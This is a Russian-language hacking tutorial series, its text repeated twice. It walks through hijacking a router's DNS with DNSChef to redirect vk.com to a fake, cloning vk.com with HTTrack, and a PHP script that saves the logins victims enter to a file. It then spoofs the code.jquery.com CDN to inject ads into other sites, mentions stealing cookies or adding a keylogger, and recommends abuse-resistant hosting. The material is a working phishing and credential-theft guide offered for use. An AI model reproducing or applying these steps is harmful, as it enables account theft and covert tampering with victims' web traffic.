Всем Салам. Писал статью про подмену DNS роутера, похищения паролей и подстановки своей рекламы, но получалось все это дело слишком громоздким. И решил я разделить на 3 части. А может будет и четвертая часть, где будем настраивать SSL для нашего фейка и пятая часть, где создадим свою админку где будем собирать структурировано наши плоды. Дополнительные скорее всего будет, если интерес ко всему этому.
Немного теории.
Итак, сегодня мы разберем поднятие нашего DNSChef. DNSChef - это DNS прокси, который поможет нам поднять фальшивый DNS, который мы подставим вместо нормально, который выдает нам провайдер.
DNS сервер - это такой же компьютер, где хранятся наши ip адреса. Когда мы вводим адрес сайта в браузере, обращаемся к DNS - серверу и говорим: "Эй, железяка, мне нужен ip адрес, на котором расположен этот сайт", он выдает нам ip, после переходим по нему и получаем в нашем браузере содержимое главной страницы. Грубое объяснения, но довольно таки понятно. Плюс, изображение:
Когда мы подставляем наш DNS сервер в роутер, то это так же работающий сервер, но мы уже можем перенаправлять пользователя на наш сайт. Т.е. теперь, когда жертва вводит vk.com, наш dns подсовывает жертве не настоящий ip адрес, а ip нашего сервера, где мы подняли фейк vk.com
1. VPS сервер, где поднимем наш dns сервак и фейковый сайт.
2. Роутер с возможностью изменения DNS, ну в современных вроде во всех можно. В моем случае имею Mikrotik hap lite
Начнем с установки DNSChef, я устанавливаю и буду делать все на VPS Ubuntu 14.04. Мы можете взять себе VPS и ставить удобный дистрибутив. Хостера также можете выбрать любого, но желательно конечно, чтобы дата-центры были за границей. У меня на ihor.ru в России, так как на этом VPS никаких махинаций не провожу. Из тех, которые за границей и довольно абузоустойчивый, могу порекомендовать zomro.com.
Запускаем наш DNSChef и мы должны увидеть это:
Видим, что DNSChef запускается нормально. Теперь мы можем запустить и указать, какой домен будет фейковым и на каком ip будет лежать наш ip адрес. Запускаем все это дело таким образом
ython dnschef.py -i IP_DNS_Прокси --fakeip IP_сервера --fakedomains vk.com
После этого идем и подставляем наш IP прокси в роутер. Как изменить DNS у вас на роутере можете найти в инете.
Готово. Дальше идем добавлять наш фейковый домен в VestaCP.
Домен добавили, когда мы это сделали через VestaCP, она автоматически настраивает и создает наш виртуальный хост.
Для примера создам тестовый файл index.html в папке vk.com с содержимым
И теперь если мы подключены к инету через роутер, где совершили подмену, то при переходе на другие сайты будет все работать правильно, а при переходе на vk.com, то сервер будет перенаправлять на наш и получим такое:
В итоге мы разобрали установку и настройку DNSChef и подмену DNS в нашем роутере.
Итак, если помните в прошлой статье и написал о поднятии dns – прокси и подстановки нашего фейкового dns.
Сегодня продолжим и разберем, как мы будем граббить (делать копию) сайта и будем похищать пароли.
[0] – Немного теории. Что у нас есть?
Итак, давайте подробнее. Какими будут наши шаги:
1. Мы будем копировать сайт, который мы хотим подделать и использовать для фишинга. Делать я это буду с помощью программки HTTrack.
2. После чего переделам форму авторизации и с помощью мини php скрипта, будем сохранять полученные доступы в файл.
На этом все, это все на минимуме, без каких-либо наворотов, тут уже каждый может под себя дорабатывать. От теории перейдем к практике и разберем поподробнее.
[1] – Практика.
[1.1] – Граббинг сайта.
Итак, в первой части, для примера мы брали vk.com. Сейчас давайте, сделаем его копию, и зальем к нам на сервак, вместо того индексного файла. Сделаем это такой командой, с помощью HTTrack:
httrack https://vk.com --headers "Accept-Language: ru-RU,ru;q=0.5" -r2 -F "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36" -O "/home/admin/web/vk.com/public_html"
Тут мы указываем url сайта, хедер для русской версии ВК, юзер-агент и куда будем копировать. После граббинга в итоге получаем такое содержимое:
Копию сайта сделали. Теперь перейдем к коду для изменении формы авторизации и написании нашего мини-скрипта.
[1.2] - Получаем доступы к аккаунту
Для того чтобы получать данные, которые пользователь вводит в форме, значение action, просто поменяем, а адрес нашего скрипта, где мы будем принимать данные.
$file = 'hack.txt';
file_put_contents($file, print_r($_POST, true), FILE_APPEND);
А на главной странице фейка, в параметр action подставим handler.php
Теперь при вводе данных и отправке их при нажатии кнопки, данные отправляются в файл handler.php и там обрабатываются и в виде массива сохраняется в файле
Всем Салам. Вот уже 3я часть серии статей про подмену DNS в роутере. Мы уже разобрали, как настроить все, грабить сайт и похищать пароли. Сегодня, мы будем разбирать подстановку рекламы в браузер. Я давно еще искал информацию про такую реализацию, но нигде так и не нашел. И тут пришлось продумывать и реализовывать самому.
Все это дело мы будем реализовывать, с помощью создания фейка CDN jQuery. Выбрал данный CDN потому что, он достаточно популярен и используется на множестве сайтов. И подменив code.jquery.com на свой фейк, мы сможем отображать рекламу и все что захотим на всех тех сайтах, где есть подключенный CDN jQuery, который по адресу code.jquery.com.
Кроме подстановки рекламы, мы можем делать еще много чего, что нам позволяет JavaScript. Например, как минимум своровать куки жертвы, внедрить кейлоггер и многое многое.
Поднимаем сайт (code.jquery.com) через вестуСП и DNSChef, как я уже описывал в первой части и уже к нам на сайт копируем наш JS файл и можем уже добавлять свой код, который будет делать то что мы хотим на сайте жертвы.
С фейком у нас все готово. С JS особо не дружу, поэтому реализовал самый минимум, обычную всплывающую форму с рекламой. Если кто хорошо дружит с JS, можете предложить варианты баннеров, например чтобы всплывала в углу и всякое такое.
После того, как мы подняли фейк и скопировали к нам добавляем в самом низу наш код, в моем случае это:
$(function() {
$( "body" ).dialog({
height: 500,
width: 550,
modal: true,
autoOpen: false
});
setTimeout(function () {
$("body").dialog("open");
}, 3000)
});
Здесь мы тупо цепляемся к тегу body и через 3 секунды после загрузки страницы подгружаем наше окно с рекламой.
В итоге, у нас пользователь никак все это дело не заподозрит и мы можем делать все что придет в нашу больную голову при условии, что есть знания по JS или есть желание эти знания получить.
И чтобы подхватить как можно больше вариантов, так как варианты подключения у разных сайтов бывают разные, вместе с code.jquery.com, можем использовать и другие сайт CDN, откуда берется скрипт.
Немного теории.
Итак, сегодня мы разберем поднятие нашего DNSChef. DNSChef - это DNS прокси, который поможет нам поднять фальшивый DNS, который мы подставим вместо нормально, который выдает нам провайдер.
DNS сервер - это такой же компьютер, где хранятся наши ip адреса. Когда мы вводим адрес сайта в браузере, обращаемся к DNS - серверу и говорим: "Эй, железяка, мне нужен ip адрес, на котором расположен этот сайт", он выдает нам ip, после переходим по нему и получаем в нашем браузере содержимое главной страницы. Грубое объяснения, но довольно таки понятно. Плюс, изображение:
Когда мы подставляем наш DNS сервер в роутер, то это так же работающий сервер, но мы уже можем перенаправлять пользователя на наш сайт. Т.е. теперь, когда жертва вводит vk.com, наш dns подсовывает жертве не настоящий ip адрес, а ip нашего сервера, где мы подняли фейк vk.com
1. VPS сервер, где поднимем наш dns сервак и фейковый сайт.
2. Роутер с возможностью изменения DNS, ну в современных вроде во всех можно. В моем случае имею Mikrotik hap lite
Начнем с установки DNSChef, я устанавливаю и буду делать все на VPS Ubuntu 14.04. Мы можете взять себе VPS и ставить удобный дистрибутив. Хостера также можете выбрать любого, но желательно конечно, чтобы дата-центры были за границей. У меня на ihor.ru в России, так как на этом VPS никаких махинаций не провожу. Из тех, которые за границей и довольно абузоустойчивый, могу порекомендовать zomro.com.
Запускаем наш DNSChef и мы должны увидеть это:
Видим, что DNSChef запускается нормально. Теперь мы можем запустить и указать, какой домен будет фейковым и на каком ip будет лежать наш ip адрес. Запускаем все это дело таким образом
ython dnschef.py -i IP_DNS_Прокси --fakeip IP_сервера --fakedomains vk.com
После этого идем и подставляем наш IP прокси в роутер. Как изменить DNS у вас на роутере можете найти в инете.
Готово. Дальше идем добавлять наш фейковый домен в VestaCP.
Домен добавили, когда мы это сделали через VestaCP, она автоматически настраивает и создает наш виртуальный хост.
Для примера создам тестовый файл index.html в папке vk.com с содержимым
И теперь если мы подключены к инету через роутер, где совершили подмену, то при переходе на другие сайты будет все работать правильно, а при переходе на vk.com, то сервер будет перенаправлять на наш и получим такое:
В итоге мы разобрали установку и настройку DNSChef и подмену DNS в нашем роутере.
Итак, если помните в прошлой статье и написал о поднятии dns – прокси и подстановки нашего фейкового dns.
Сегодня продолжим и разберем, как мы будем граббить (делать копию) сайта и будем похищать пароли.
[0] – Немного теории. Что у нас есть?
Итак, давайте подробнее. Какими будут наши шаги:
1. Мы будем копировать сайт, который мы хотим подделать и использовать для фишинга. Делать я это буду с помощью программки HTTrack.
2. После чего переделам форму авторизации и с помощью мини php скрипта, будем сохранять полученные доступы в файл.
На этом все, это все на минимуме, без каких-либо наворотов, тут уже каждый может под себя дорабатывать. От теории перейдем к практике и разберем поподробнее.
[1] – Практика.
[1.1] – Граббинг сайта.
Итак, в первой части, для примера мы брали vk.com. Сейчас давайте, сделаем его копию, и зальем к нам на сервак, вместо того индексного файла. Сделаем это такой командой, с помощью HTTrack:
httrack https://vk.com --headers "Accept-Language: ru-RU,ru;q=0.5" -r2 -F "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36" -O "/home/admin/web/vk.com/public_html"
Тут мы указываем url сайта, хедер для русской версии ВК, юзер-агент и куда будем копировать. После граббинга в итоге получаем такое содержимое:
Копию сайта сделали. Теперь перейдем к коду для изменении формы авторизации и написании нашего мини-скрипта.
[1.2] - Получаем доступы к аккаунту
Для того чтобы получать данные, которые пользователь вводит в форме, значение action, просто поменяем, а адрес нашего скрипта, где мы будем принимать данные.
$file = 'hack.txt';
file_put_contents($file, print_r($_POST, true), FILE_APPEND);
А на главной странице фейка, в параметр action подставим handler.php
Теперь при вводе данных и отправке их при нажатии кнопки, данные отправляются в файл handler.php и там обрабатываются и в виде массива сохраняется в файле
Всем Салам. Вот уже 3я часть серии статей про подмену DNS в роутере. Мы уже разобрали, как настроить все, грабить сайт и похищать пароли. Сегодня, мы будем разбирать подстановку рекламы в браузер. Я давно еще искал информацию про такую реализацию, но нигде так и не нашел. И тут пришлось продумывать и реализовывать самому.
Все это дело мы будем реализовывать, с помощью создания фейка CDN jQuery. Выбрал данный CDN потому что, он достаточно популярен и используется на множестве сайтов. И подменив code.jquery.com на свой фейк, мы сможем отображать рекламу и все что захотим на всех тех сайтах, где есть подключенный CDN jQuery, который по адресу code.jquery.com.
Кроме подстановки рекламы, мы можем делать еще много чего, что нам позволяет JavaScript. Например, как минимум своровать куки жертвы, внедрить кейлоггер и многое многое.
Поднимаем сайт (code.jquery.com) через вестуСП и DNSChef, как я уже описывал в первой части и уже к нам на сайт копируем наш JS файл и можем уже добавлять свой код, который будет делать то что мы хотим на сайте жертвы.
С фейком у нас все готово. С JS особо не дружу, поэтому реализовал самый минимум, обычную всплывающую форму с рекламой. Если кто хорошо дружит с JS, можете предложить варианты баннеров, например чтобы всплывала в углу и всякое такое.
После того, как мы подняли фейк и скопировали к нам добавляем в самом низу наш код, в моем случае это:
$(function() {
$( "body" ).dialog({
height: 500,
width: 550,
modal: true,
autoOpen: false
});
setTimeout(function () {
$("body").dialog("open");
}, 3000)
});
Здесь мы тупо цепляемся к тегу body и через 3 секунды после загрузки страницы подгружаем наше окно с рекламой.
В итоге, у нас пользователь никак все это дело не заподозрит и мы можем делать все что придет в нашу больную голову при условии, что есть знания по JS или есть желание эти знания получить.
И чтобы подхватить как можно больше вариантов, так как варианты подключения у разных сайтов бывают разные, вместе с code.jquery.com, можем использовать и другие сайт CDN, откуда берется скрипт.
